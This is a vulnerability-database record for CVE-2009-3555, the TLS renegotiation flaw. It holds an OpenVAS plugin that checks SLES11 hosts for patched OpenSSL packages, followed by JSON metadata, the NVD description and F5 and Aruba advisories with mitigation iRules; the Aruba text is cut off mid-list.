ID OPENVAS:66285 Type openvas Reporter Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com Modified 2017-07-11T00:00:00
Description
The remote host is missing updates to packages that affect
the security of your system. One or more of the following packages
are affected:
libopenssl0_9_8
openssl
openssl-doc
More details may also be found by searching for the SuSE
Enterprise Server 11 patch database located at
http://download.novell.com/patch/finder/
#
#VID d0129289ed5f99e99f64649fe9227069
# OpenVAS Vulnerability Test
# $
# Description: Security update for libopenssl
#
# Authors:
# Thomas Reinke <reinke@securityspace.com>
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisories, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
include("revisions-lib.inc");
tag_summary = "The remote host is missing updates to packages that affect
the security of your system. One or more of the following packages
are affected:
libopenssl0_9_8
openssl
openssl-doc
More details may also be found by searching for the SuSE
Enterprise Server 11 patch database located at
http://download.novell.com/patch/finder/";
tag_solution = "Please install the updates provided by SuSE.";
if(description)
{
script_xref(name : "URL" , value : "https://bugzilla.novell.com/show_bug.cgi?id=553641");
script_id(66285);
script_version("$Revision: 6666 $");
script_tag(name:"last_modification", value:"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $");
script_tag(name:"creation_date", value:"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)");
script_cve_id("CVE-2009-3555");
script_tag(name:"cvss_base", value:"5.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:P");
script_name("SLES11: Security update for libopenssl");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
script_family("SuSE Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/suse_sles", "ssh/login/rpms");
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
#
# The script code starts here
#
include("pkg-lib-rpm.inc");
res = "";
report = "";
if ((res = isrpmvuln(pkg:"libopenssl0_9_8", rpm:"libopenssl0_9_8~0.9.8h~30.15.1", rls:"SLES11.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"openssl", rpm:"openssl~0.9.8h~30.15.1", rls:"SLES11.0")) != NULL) {
report += res;
}
if ((res = isrpmvuln(pkg:"openssl-doc", rpm:"openssl-doc~0.9.8h~30.15.1", rls:"SLES11.0")) != NULL) {
report += res;
}
if (report != "") {
security_message(data:report);
} else if (__pkg_match) {
exit(99); # Not vulnerable.
}
{"href": "http://plugins.openvas.org/nasl.php?oid=66285", "history": [{"lastseen": "2017-07-02T21:14:01", "differentElements": ["modified", "sourceData"], "edition": 1, "bulletin": {"href": "http://plugins.openvas.org/nasl.php?oid=66285", "history": [], "naslFamily": "SuSE Local Security Checks", "id": "OPENVAS:66285", "title": "SLES11: Security update for libopenssl", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libopenssl0_9_8\n openssl\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "published": "2009-11-17T00:00:00", "type": "openvas", "bulletinFamily": "scanner", "hashmap": [{"key": "description", "hash": "e2db15a9f275f82bbf17705053c826ac"}, {"key": "cvelist", "hash": "742112eef7f5ab3c946b475c9001976d"}, {"key": "reporter", "hash": "b778055b37159119ce97e96620d4ff56"}, {"key": "published", "hash": "6f550d4bd132793c5b6126057c909b68"}, {"key": "href", "hash": "ab8b656bbdd9ca87801a43d4de3a2ffb"}, {"key": "cvss", "hash": "8a28889787508bab047d7fa94ce9a58c"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}, {"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "8f8d9a0f9acbe489c557d698b7999ab4"}, {"key": "references", "hash": "68b6813167fc0f9f27d479714c35fa41"}, {"key": "title", "hash": "b3d1469c93ab7541740a0ca8b61f3783"}, {"key": "sourceData", "hash": "096e1151471e1a34acfa7e4964ee4bc4"}, {"key": "modified", "hash": "bc929365b9dbe8171ea5c6a04ee4e79f"}], "sourceData": "#\n#VID d0129289ed5f99e99f64649fe9227069\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for libopenssl\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libopenssl0_9_8\n openssl\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=553641\");\n script_id(66285);\n script_version(\"$Revision: 5171 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-02 15:30:54 +0100 (Thu, 02 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES11: Security update for libopenssl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"login/SSH/success\", \"HostDetails/OS/cpe:/o:suse:linux_enterprise_server\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "pluginID": "66285", "hash": "e10d340b1f7e6b74cc8f7211d909a982661f7f81f7451149600338806595cbf0", "modified": "2017-02-02T00:00:00", "edition": 1, "cvelist": ["CVE-2009-3555"], "lastseen": "2017-07-02T21:14:01", "viewCount": 0, "enchantments": {}, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "objectVersion": "1.3", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=553641"]}}], "naslFamily": "SuSE Local Security Checks", "id": "OPENVAS:66285", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-11-17T00:00:00", "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libopenssl0_9_8\n openssl\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "title": "SLES11: Security update for libopenssl", "bulletinFamily": "scanner", "type": "openvas", "sourceData": "#\n#VID d0129289ed5f99e99f64649fe9227069\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for libopenssl\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n libopenssl0_9_8\n openssl\n openssl-doc\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=553641\");\n script_id(66285);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)\");\n script_cve_id(\"CVE-2009-3555\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_name(\"SLES11: Security update for libopenssl\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"libopenssl0_9_8\", rpm:\"libopenssl0_9_8~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~0.9.8h~30.15.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "pluginID": "66285", "hash": "7ca4795fcb9f760c38d764094333856980fafef1768b99999a7dd6a205ff8ba2", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=553641"], "edition": 2, "cvelist": ["CVE-2009-3555"], "lastseen": "2017-07-26T08:55:41", "viewCount": 0, "enchantments": {"score": {"value": 5.6, "vector": "NONE", "modified": "2017-07-26T08:55:41"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3555"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2009-3555"]}, {"type": "f5", "idList": ["F5:K10737", "SOL10737"]}, {"type": "ubuntu", "idList": ["USN-927-1", "USN-990-1", "USN-927-5", "USN-990-2", "USN-927-4"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22777", "SECURITYVULNS:DOC:23890", "SECURITYVULNS:VULN:10388", "SECURITYVULNS:DOC:22982", "SECURITYVULNS:DOC:22763"]}, {"type": "redhat", "idList": ["RHSA-2010:0130", "RHSA-2010:0155"]}, {"type": "nessus", "idList": ["SUSE_OPENSSL-6654.NASL", "SUSE_11_0_COMPAT-OPENSSL097G-091113.NASL", "FEDORA_2009-13236.NASL", "SUSE_COMPAT-OPENSSL097G-6657.NASL", "SUSE_OPENSSL-6655.NASL", "HPSMH_6_1_0_102.NASL", "SUSE_11_0_LIBOPENSSL-DEVEL-091112.NASL", "FEDORA_2010-9487.NASL", "FEDORA_2010-3956.NASL", "SUSE_11_2_LIBFREEBL3-100406.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:66302", "OPENVAS:1361412562310840455", "OPENVAS:880612", "OPENVAS:1361412562310862184", "OPENVAS:862207", "OPENVAS:1361412562310900247", "OPENVAS:1361412562310880612", "OPENVAS:840468", "OPENVAS:136141256231066285", "OPENVAS:861798"]}, {"type": "exploitdb", "idList": ["EDB-ID:10071", "EDB-ID:10579"]}, {"type": "oraclelinux", "idList": ["ELSA-2010-0165"]}, {"type": "centos", "idList": ["CESA-2010:0164"]}, {"type": "hackerone", "idList": ["H1:5617"]}, {"type": "debian", "idList": ["DEBIAN:DSA-2141-2:2C2CF", "DEBIAN:DSA-2141-1:7D2D7"]}, {"type": "seebug", "idList": ["SSV:15088", "SSV:18637", "SSV:67231"]}, {"type": "cisco", "idList": ["CISCO-SA-20091105-CVE-2009-3555"]}], "modified": "2017-07-26T08:55:41"}, "vulnersScore": 5.6}, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "742112eef7f5ab3c946b475c9001976d"}, {"key": "cvss", "hash": "8a28889787508bab047d7fa94ce9a58c"}, {"key": "description", "hash": "e2db15a9f275f82bbf17705053c826ac"}, {"key": "href", "hash": "ab8b656bbdd9ca87801a43d4de3a2ffb"}, {"key": "modified", "hash": "bf6febede5ca68e35fdf4a0f47b4ef18"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "8f8d9a0f9acbe489c557d698b7999ab4"}, {"key": "published", "hash": "6f550d4bd132793c5b6126057c909b68"}, {"key": "references", "hash": "68b6813167fc0f9f27d479714c35fa41"}, {"key": "reporter", "hash": "b778055b37159119ce97e96620d4ff56"}, {"key": "sourceData", "hash": "1030bba733f6da4724d643ff656ec0b2"}, {"key": "title", "hash": "b3d1469c93ab7541740a0ca8b61f3783"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "objectVersion": "1.3", "modified": "2017-07-11T00:00:00"}
{"cve": [{"lastseen": "2020-02-15T13:30:07", "bulletinFamily": "NVD", "description": "The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a \"plaintext injection\" attack, aka the \"Project Mogul\" issue.", "modified": "2019-07-03T17:25:00", "id": "CVE-2009-3555", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555", "published": "2009-11-09T17:30:00", "title": "CVE-2009-3555", "type": "cve", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "openssl": [{"lastseen": "2016-09-26T17:22:35", "bulletinFamily": "software", "description": "Implement RFC5746 to address vulnerabilities in SSL/TLS renegotiation.", "modified": "2009-11-05T00:00:00", "published": "2009-11-05T00:00:00", "id": "OPENSSL:CVE-2009-3555", "href": "https://www.openssl.org/news/vulnerabilities.html", "type": "openssl", "title": "Vulnerability in OpenSSL (CVE-2009-3555)", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "f5": [{"lastseen": "2020-02-28T00:34:55", "bulletinFamily": "software", "description": "", "modified": "2019-06-13T19:54:00", "published": "2013-07-06T01:56:00", "id": "F5:K10737", "href": "https://support.f5.com/csp/article/K10737", "title": "SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2016-05-30T21:02:08", "bulletinFamily": "software", "description": "A Man in the Middle attack allows an attacker to inject an arbitrary amount of chosen plain text into the application protocol stream data during a secure session renegotiation that uses SSL version 3.x or TLS version 1.x. This may provide an attacker the ability to perform arbitrary actions on affected websites with user's credentials. This vulnerability does not allow one to decrypt the intercepted network communication.\n\nInformation about this advisory is available at the following locations:\n\n**Note**: These links take you to a resource outside of AskF5, and it is possible that the documents may be removed without our knowledge.\n\n * <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555>\n\n**Note**: F5 thanks Marsh Ray, who originally identified and reported this vulnerability.\n\nThe IETF has adopted as [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>) a new extension to the TLS standard that addresses this issue. F5 Product Development has implemented this new extension beginning in BIG-IP versions 10.2.3 and 11.0.0.\n\n**Important**: When session renegotiation is disabled, some browsers may log an informational message that appears similar to the following example to the console, when connecting to F5 products:\n\nServer does not support RFC 5746, see CVE-2009-3555\n\nAlthough the message implies that the F5 product to which the browser is connecting is vulnerable to this attack, all vulnerable F5 Products have been patched to disable SSL/TLS renegotiation, and some have been further enhanced to allow explicit control over renegotiation, thus mitigating this attack. For more information regarding completed and planned updates related to this vulnerability, refer to the following table. Note that ID 223836 specifically addresses this error message.\n\nF5 Product Development is tracking this issue as follows:\n\nCR / ID | Description | Affected products | Included in \n---|---|---|--- \nCR132165 / \n \nID 213305 | Introduce the **<disable|enable>** parameter to the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command to control on a per-connection basis how TMM should respond to SSL 3.0/TLS 1.0 renegotiation requests. \n\n\n**Important**: Client-side session renegotiation is still enabled, by default, in versions prior to 10.1.0. In these versions, you must apply an iRule using the **SSL::renegotiate disable **command to each virtual server configuration you wish to protect from this vulnerability. Refer to the mitigation section, following, for more information.\n\n**Note**: For more information, refer to the DevCentral wiki page for the **[SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>)** iRule command.\n\n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEngineering Hotfix available for: \nEnterprise Manager 1.8 \nCR132166 / \n \nID 213306 | Patch OpenSSL to disable midstream session renegotiation. This patch protects the Configuration utility and iControl against this vulnerability. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132167 / \n \nID 213307 | Enable midstream session renegotiation for the **big3d **and **gtmd**. This CR is a companion to CR132166, re-enabling mid-stream session renegotiation for the **big3d **and **gtmd** processes, which maintain long-lived iQuery-over-SSL connections that are renegotiated daily. These connections are mutually authenticated using 2-way SSL authentication prior to exchanging application traffic and, thus, are not vulnerable to the man-in-the-middle attacks described in this Solution. | LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 9.3.1 HF8 \nBIG-IP 9.4.8 HF2 \nBIG-IP 10.0.1 HF3 \nBIG-IP 10.1.0 and later \nEnterprise Manager 2.0 \nEnterprise Manager 1.8 HF1 \nCR132170 / \n \nID 213308 | Introduce a Client SSL / ServerSSL profile option to control whether midstream session renegotiation is allowed. In versions 10.1.0 - 10.2.2, the default setting for the Client SSL profile is **disabled**, and the default setting for the Server SSL profile is **enabled**. **Note**: BIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM | BIG-IP 10.1.0 and later \n \nCR132172 / \n \nID 223836 | Implement [RFC5746: Transport Layer Security (TLS) Renegotiation Indication Extension](<http://tools.ietf.org/html/rfc5746>), an extension to the TLS standard for secure midstream session renegotiation. **Note**: For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension. \n| LTM, GTM, ASM, PSM, Link Controller, WebAccelerator, WOM, Enterprise Manager | BIG-IP 10.2.3 \nBIG-IP 11.0.0 and later \n \nCR132177 / \nID 295760\n\nand\n\nCR132177-1 / \nID 294172\n\n| Patch OpenSSL to disable midstream session renegotiation. | FirePass | \n\nFirePass 7.0.0 and later \nFirePass 6.1.0 HF1 * \nFirePass 6.0.3 hotfix-132177-1 \nFirePass 6.0.2 hotfix-132177-1 \nFirePass 5.5.2 hotfix-132177-1 \nFirePass 5.5.1 hotfix-132177-1 \nFirePass 5.5 hotfix-132177-1 \n \nImportant: For version 6.1.0, the \nfix for this ID was not included in \nHF3 or HF4. Install the latest \ncumulative hotfix. \n \nID 37053 | Patch or upgrade Apache Tomcat to disable session renegotiation. | ARX | ARX 6.2.0 \n \n \nIf a named hotfix has been issued for your software version, you may download the referenced hotfix or later versions of the hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nIf an engineering hotfix has been issued for your software version, you should contact [F5 Technical Support](<http://www.f5.com/training-support/customer-support/contact/>), and reference this Solution number and the associated CR number to request the hotfix.\n\nFor a list of the latest available hotfixes, refer to SOL9502: BIG-IP hotfix matrix.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of the F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n\nFor information about installing version 10.x hotfixes, refer to SOL10025: Managing BIG-IP product hotfixes (10.x).\n\n**Mitigation steps for BIG-IP LTM, ASM, PSM, Link Controller, WebAccelerator, or WOM SSL virtual servers**\n\nYou can use the Client SSL profile Renegotiation setting or an iRule to disable client-side session renegotiation for virtual servers. Refer to the following section that applies to your version:\n\n**Note**: Applications that require session renegotiation are inherently vulnerable to the attack. Only removal of the renegotiation requirement in the application itself will eliminate the vulnerability. If session renegotiation is disabled by any of the vulnerability mitigation steps described later, without modifying the application, client connections will be dropped. For example, IE 5.0 clients accessing applications which use SGC (Server Gated Cryptography) certificates are known to require renegotiation, and their connections would be disrupted by such a configuration.\n\n**Important**: Any mitigation action that re-enables session re-negotiation on patched vulnerable versions may re-expose your F5 system to this vulnerability. In some cases, iRule logic can be used to control this behavior. Refer to the following sections for details regarding your product and version.\n\n**BIG-IP versions 10.1.0 and later**\n\nBIG-IP versions 10.2.3 and later support the Renegotiation Indication Extension. SSL Renegotiation setting is **Enabled,** by default, in the SSL profiles, however, the system requires secure renegotiation of SSL connections. For more information, refer to SOL13512: Change in Behavior: The BIG-IP SSL profiles support the TLS Renegotiation Indication Extension.\n\nIn BIG-IP version 10.1.0, the Renegotiation setting was added to the BIG-IP Client session and Server SSL profiles as a result of ID 213308 (formerly CR132180). In versions 10.1.0 - 10.2.2, the Renegotiation setting is **Disabled **by default in the Client SSL profile. Virtual servers using a Client SSL profile with the Renegotiation setting configured to **Disabled **are protected from this vulnerability.\n\nIf necessary, you can selectively enable renegotiation using the **SSL::renegotiate** iRules command on a virtual server that has renegotiation disabled in its Client SSL profile. For example, an iRule similar to the following enables renegotiation only for clients within a single Class C subnet:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nif { [IP::addr [IP::client_addr] equals 192.168.222.0/24] }{ \nSSL::renegotiate enable \n} \n}\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, and 10.1.0 through 10.2.x**\n\nTo mitigate the vulnerability, a BIG-IP system administrator may apply iRules similar to the following to each SSL virtual server. This sample iRule uses the **SSL::renegotiate** command to disable client-side session renegotiation, which prevents the BIG-IP system from processing a secondary session renegotiation request:\n\nwhen CLIENTSSL_HANDSHAKE priority 1 { \nSSL::renegotiate disable \n}\n\nThe **<enable|disable>**parameter was added to the **SSL::renegotiate** command in versions 9.3.1 HF8, 9.4.8 HF2, 10.0.1 HF3, 10.1.x, and 10.2.0 as a result of ID 213305 (formerly CR132165). In versions prior to 10.1.0, all virtual servers with a Client SSL profile applied will, by default, still accept session renegotiation.\n\n**Note**: For more information, refer to the DevCentral wiki page for the [SSL::renegotiate](<https://devcentral.f5.com/wiki/iRules.ssl__renegotiate.ashx>) iRule command. A separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n\n**BIG-IP versions 9.4.x, 9.3.x prior to 9.3.1 HF8, and 10.0.x prior to 10.0.1 HF3**\n\nTo mitigate the vulnerability in versions that do not include the **SSL::renegotiate** command, apply an iRule similar to the following to each SSL virtual server. The iRule resets the connection if client-side SSL renegotiation is attempted.\n\nwhen CLIENT_ACCEPTED { \n# initialize TLS/SSL handshake count for this connection \nset sslhandshakecount 0 \n} \nwhen CLIENTSSL_HANDSHAKE priority 1 { \n# a handshake just occurred \nincr sslhandshakecount \n# is this the first handshake in this connection? \nif { $sslhandshakecount > 1 } { \n# log (rate limited) the event (to /var/log/ltm) \nlog \"\\\\[VS [IP::local_addr]:[TCP::local_port] client [IP::remote_addr]:[TCP::remote_port]\\\\]:TLS/SSL renegotiation\" \n# if not, close the clientside connection \nreject \n} \n} \n\n\n**Note**: This example was provided by F5 DevCentral poster Lupo. The original post is available at the following location:\n\n[mitigating the TLS client-initiated renegotiation MITM attack](<http://devcentral.f5.com/Default.aspx?tabid=53&forumid=5&postid=86456&view=topic>)\n\nA separate DevCentral login is required to access this content; you will be redirected to authenticate or register (if necessary).\n", "modified": "2013-07-05T00:00:00", "published": "2009-11-05T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/10000/700/sol10737.html", "id": "SOL10737", "title": "SOL10737 - SSL Renegotiation vulnerability - CVE-2009-3555 / VU#120541", "type": "f5", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:33", "bulletinFamily": "software", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAruba Networks Security Advisory\r\n\r\nTitle: TLS Protocol Session Renegotiation Security Vulnerability\r\n\r\nAruba Advisory ID: AID-020810\r\nRevision: 1.0\r\n\r\nFor Public Release on 02/08/2010\r\n\r\n+----------------------------------------------------\r\n\r\nSUMMARY\r\n\r\nThis advisory addresses the renegotiation related vulnerability\r\ndisclosed recently in Transport Layer Security protocol [1][2]. This\r\nvulnerability may allow a Man-in-the-Middle (MITM) attacker to inject\r\narbitrary data into the beginning of the application protocol stream\r\nprotected by TLS.\r\n\r\nThe only ArubaOS component that seems affected by this issue is the\r\nHTTPS WebUI administration interface. If a client browser (victim) is\r\nconfigured to authenticate to the WebUI over HTTPS using a client\r\ncertificate, an attacker can potentially use the victim's credentials\r\ntemporarily to execute arbitrary HTTP request for each initiation of an\r\nHTTPS session from the victim to the WebUI. This would happen without\r\nany HTTPS/TLS warnings to the victim. This condition can essentially be\r\nexploited by an attacker for command injection in beginning of a HTTPS\r\nsession between the victim and the ArubaOS WebUI.\r\n\r\nArubaOS itself does not initiate TLS renegotiation at any point and\r\nhence is only vulnerable to scenario where a client explicitly requests\r\nTLS renegotiation. Captive Portal users do not seem vulnerable to this\r\nissue unless somehow client certificates are being used to authenticate\r\ncaptive portal users.\r\n\r\nAFFECTED ArubaOS VERSIONS\r\n\r\n 2.5.6.x, 3.3.2.x, 3.3.3.x, 3.4.0.x, 3.4.1.x, 